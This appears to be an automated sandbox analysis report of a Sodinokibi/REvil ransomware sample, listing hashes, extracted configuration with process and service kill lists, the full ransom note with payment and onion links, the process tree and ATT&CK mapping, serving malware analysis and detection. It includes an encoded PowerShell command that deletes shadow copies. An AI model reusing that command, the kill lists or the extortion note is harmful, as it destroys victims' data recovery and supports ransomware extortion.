Analysis

  • max time kernel
    143s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-08-2023 08:38

General

  • Target

    97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe

  • Size

    221KB

  • MD5

    77ed1092409c927f5cd1992021f99147

  • SHA1

    4c9027e660614db7fe653e67a7ac0b726b52cc44

  • SHA256

    97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463

  • SHA512

    1e01f85f50179fb7620680809862c28c8955e696b397acd6766a2d8a18b81cc08f99c2a059213797ea8de1e004412b9d4853cf1c2ae9f451505322b00e26238a

  • SSDEEP

    6144:Za/6o9aptGtbbqcqjuEyileXEHpSYxyEpq:S5atGtfqcqju3iXHpSgq

Malware Config

Extracted

Family

sodinokibi

Botnet

$2a$10$MaBWjCXKB3kROpX5KeARM.SC7uhuuBCbvRC/J3KvhMn3f11EUJg3.

Campaign

4402

Decoy

gopackapp.com

croftprecision.co.uk

sanyue119.com

chatizel-paysage.fr

falcou.fr

theshungiteexperience.com.au

xn--vrftet-pua.biz

slimani.net

vibethink.net

mrxermon.de

hebkft.hu

danskretursystem.dk

castillobalduz.es

pmc-services.de

advizewealth.com

pixelarttees.com

testcoreprohealthuk.com

ino-professional.ru

alvinschwartz.wordpress.com

mercantedifiori.com

Attributes
  • net

    true

  • pid

    $2a$10$MaBWjCXKB3kROpX5KeARM.SC7uhuuBCbvRC/J3KvhMn3f11EUJg3.

  • prc

    isqlplussvc

    mydesktopqos

    onenote

    ocomm

    dbsnmp

    powerpnt

    winword

    thebat

    sql

    infopath

    visio

    firefox

    tbirdconfig

    wordpad

    agntsvc

    msaccess

    sqbcoreservice

    xfssvccon

    dbeng50

    thunderbird

    outlook

    mspub

    excel

    mydesktopservice

    steam

    ocautoupds

    oracle

    encsvc

    synctime

    ocssd

  • ransom_oneliner

    Soon you may lose your files FOREVER Find: "readme-{EXT}-NOW.txt" in folders or on your desktop! YOU HAVE A FEW DAYS OR A FILE WILL BE LOST FOREVER !!!

  • ransom_template

    Your files are locked due to a vulnerability in your system by "{EXT}" extension. You will not be able to decrypt the files yourself, in the worst case you can destroy the data irreversibly. The only way to unlock your data is to buy the decryption program. Go to the link written below to more details. If you cannot do this yourself, find a data recovery company in internet. They cannot help you unlock your data, because only we have decryption key, but will help you make a payment and provide you guarantees. ATTENTION! DATA RECOVERY AGENCIES WORK AND DURING THE CORONOVIRUS QUARANTINE, THEY WILL HELP YOU REMOTE. Also, I ask you to note, you have no long time, if you do not make payment soon, the price for the decryptor will double. So I recommend you dont waste time and move! Go to the page through the browser: http://decryptor.cc/{UID} If your site does not open, then download the "TOR Browser" (https://torproject.org/). If you cannot access the download page of the "TOR Browser", then download the VPN! After installing "TOR Browser", open it and follow the link: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} After going to the site, enter the following code: {KEY}

  • sub

    4402

  • svc

    vss

    backup

    svc$

    memtas

    sql

    veeam

    mepocs

    sophos

Extracted

Path

C:\Recovery\readme-ovxmopp-NOW.txt

Ransom Note
Your files are locked due to a vulnerability in your system by "ovxmopp" extension. You will not be able to decrypt the files yourself, in the worst case you can destroy the data irreversibly. The only way to unlock your data is to buy the decryption program. Go to the link written below to more details. If you cannot do this yourself, find a data recovery company in internet. They cannot help you unlock your data, because only we have decryption key, but will help you make a payment and provide you guarantees. ATTENTION! DATA RECOVERY AGENCIES WORK AND DURING THE CORONOVIRUS QUARANTINE, THEY WILL HELP YOU REMOTE. Also, I ask you to note, you have no long time, if you do not make payment soon, the price for the decryptor will double. So I recommend you dont waste time and move! Go to the page through the browser: http://decryptor.cc/4B13C627D46B7444 If your site does not open, then download the "TOR Browser" (https://torproject.org/). If you cannot access the download page of the "TOR Browser", then download the VPN! After installing "TOR Browser", open it and follow the link: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/4B13C627D46B7444 After going to the site, enter the following code: 28KcMc/kmhvEq6BqQZltUPfqz0x1+utMG1QEPyneIigghEQIlsuwejKhmYE/w955 PrMvoZV8WI/Ei2z271VUdfaZ6TLB8oxQEY4LL2WgZ3TRhTJSi7DQjIsnKMC64Ptt XReK2NUL9TSiUC2Pc9qVHAdcFA4tHf1kS8lUZqJtKwJwpBwq7pM/RsQ/uRHoWclJ p/I9Fe42w+3cVLjgCMxwQjdK35k45wIm1Dnye0ZAlOz3DqtlfAZRiXE1anRlH0HM BG71ydNabyOf+BxPuc092x1QDwjP3HPKd2jXEZQZ9Dm/i1C1tmQvuQ7rzL4nxmdz xQyJAI1txLgpF/dVTthRBwQoc73bdauriFhhQgA2AUfcOh6iH1pzG0IvDPiOH1hU jiT5dU0yyUwhmelwAVTt7Yy1kbc9PWQOugSCwnGWqYwBr48PoxYjA1AxVXp0u/eo 4voMXhO6VeGGfTUe6R8/+SMPG9qw6MOYQRlRYDeT4z94auqZrIPv077sk2yUjYuq ous/rHFdj37eAzd36+jKlnt/Mon7bNGL2bUGDov/i2E4NIbPYDm0nGB28K4o9W+R 7+0ozf4vKrSdDuavkZ9ZeRgCtINnrbCJwRWJPJZdkVEoWsBpIe68DmeL4vP3rAic m/TNA5eIfyH3MqZ/blkSpBEPM70yHaprfCEq5EYP3OgjMKaEf22AJmnPm7/3xUX4 Syz2DKFtoxshhXPRWLbWrBqYMMPoVcLswOfDSKJNlR+EcWfbGYCjBei+US13X4om NFnukHR0ZqtHtZy8jQfUz5WYuOEW89Y9FMZp4m5R/JbeXesYxTDBAJTgmvoDRM3w /z843g1XwP+GEO4Vv2pvO/Zyrkgwgu6nvg5onjgo1y2kssMYViCfRqIw3qqJcIzt eM/xxwj9qOCsGDmCfCr5HBB+EXjogVGJpuP9dS3nr2/8pp8mXm6QR3O0ZZxsAJXf LurVSCbJ7rOzmUmFpOxOonI/NzPSCgk4DTF40KweYwIOybg74g9KlwvTqmt4/CxU LiglQli73602sNDPQ+f7uxU6byERsqxfRMCCeNzdxP7DGDMXaJzqxymIWldqYmJg Pjp39v0sOEbeoXWUfSLsZ4EJRI22ZoxYySsEBK1HJ4l2NFsfy7X+p3NIG4NlqhbF gT3IshbfYncx5hiznhEG0v6/oMigDTRy6HHKZE1iMUAGHTBJNV7EwkpQIC1mQMvp qWF9LaG+TQ/S5Lu+sB3Db0GjIYQihoFpJRydKNkMwgeNoqAYuVbw/aV1dywArB6D mH3W7iRyd7UPBVFfr0anDREWSc9RcLThH5cHWvO2K/IBCFoeoQ0/lEqOMxTDLNUF ojcY/ogwMkf7OQPOICT+rVI1+mRmBaB+UndDCMBEfQNKDxAdLlUxIg==
URLs

http://decryptor.cc/4B13C627D46B7444

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/4B13C627D46B7444

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 21 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
    "C:\Users\Admin\AppData\Local\Temp\97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2968
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3892
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:3532
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3640

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Persistence

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Privilege Escalation

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Defense Evasion

    Modify Registry

    3
    T1112

    Subvert Trust Controls

    1
    T1553

    Install Root Certificate

    1
    T1553.004

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Recovery\readme-ovxmopp-NOW.txt
      Filesize

      5KB

      MD5

      448717cc613f7c4c1b88e9913c7fce49

      SHA1

      21c0b07140bb7106626000bf771170a9c3d85c0b

      SHA256

      76e0168ddc8710eac49928713b22afd23113aa2cb72e328b5112b212f543a377

      SHA512

      2cc41496bc8280d04de9d26920f2da580198bc9a94d83a5f162b6945d839414897bcf03953b68e03bbfc97eb5353e8cafe26989b934170287a039d6548237bb3

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tdbp4etl.nlb.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/2968-577-0x0000000000400000-0x000000000086F000-memory.dmp
      Filesize

      4MB

    • memory/2968-134-0x0000000000A70000-0x0000000000B70000-memory.dmp
      Filesize

      1024KB

    • memory/2968-587-0x0000000000400000-0x000000000086F000-memory.dmp
      Filesize

      4MB

    • memory/2968-584-0x0000000000400000-0x000000000086F000-memory.dmp
      Filesize

      4MB

    • memory/2968-580-0x0000000000400000-0x000000000086F000-memory.dmp
      Filesize

      4MB

    • memory/2968-579-0x0000000000400000-0x000000000086F000-memory.dmp
      Filesize

      4MB

    • memory/2968-136-0x0000000000400000-0x000000000086F000-memory.dmp
      Filesize

      4MB

    • memory/2968-153-0x0000000000400000-0x000000000086F000-memory.dmp
      Filesize

      4MB

    • memory/2968-160-0x0000000000A70000-0x0000000000B70000-memory.dmp
      Filesize

      1024KB

    • memory/2968-135-0x00000000001C0000-0x00000000001EB000-memory.dmp
      Filesize

      172KB

    • memory/2968-570-0x00000000001C0000-0x00000000001EB000-memory.dmp
      Filesize

      172KB

    • memory/2968-571-0x0000000000400000-0x000000000086F000-memory.dmp
      Filesize

      4MB

    • memory/2968-575-0x0000000000400000-0x000000000086F000-memory.dmp
      Filesize

      4MB

    • memory/3892-152-0x00007FF958690000-0x00007FF959151000-memory.dmp
      Filesize

      10MB

    • memory/3892-149-0x000001C5EAF60000-0x000001C5EAF70000-memory.dmp
      Filesize

      64KB

    • memory/3892-148-0x000001C5EAF60000-0x000001C5EAF70000-memory.dmp
      Filesize

      64KB

    • memory/3892-147-0x00007FF958690000-0x00007FF959151000-memory.dmp
      Filesize

      10MB

    • memory/3892-146-0x000001C5EB310000-0x000001C5EB332000-memory.dmp
      Filesize

      136KB